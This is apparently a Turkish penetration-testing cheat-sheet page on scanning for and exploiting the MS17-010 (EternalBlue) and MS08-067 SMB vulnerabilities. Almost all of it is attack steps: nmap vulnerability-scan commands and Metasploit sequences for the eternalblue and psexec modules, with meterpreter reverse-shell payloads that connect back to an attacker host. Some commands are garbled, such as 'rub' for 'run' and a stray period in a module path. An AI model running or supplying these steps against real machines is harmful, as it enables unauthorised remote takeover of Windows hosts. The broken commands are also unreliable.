MS17-010

Nmap ile ms17-010 ve ms08-067 zafiyetine sahip makineleri bulmak ve Exploit Etmek

Öncelikle aşağıdaki nmap komutu ile eternal blue zafiyetine sahip makineler listelenir.
nmap -p445 --script smb-vuln-ms17-010 <target>
Zafiyetli makineler bulunduktan sonra metasploit ile expxloit etmek için aşağıdaki yönergeler uygulanmalıdır.
msf > use exploit/windows/smb/ms17_010_eternalblue.
msf > set payload windows/x64/meterpreter/reverse_tcp
msf > set LPORT L_PORT
msf > set LHOST L_IP
msf > set RHOST R_IP
msf > set RPORT R_PORT
msf > rub

ms17-010_psexec metasploit modüle

msf > use windows/smb/ms17_010_psexec
msf > set RHOSTS IP
msf > set payload windows/meterpreter/reverse_tcp_rc4
msf > set RC4PAsSWORD  pass
msf > set LHOST KALI_IP
msf > set LPORT 443
msf > exploit

MS08-67

root@kali:~# nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 IP

Previousad-101 NextSMB

Last updated 3 years ago

Was this helpful?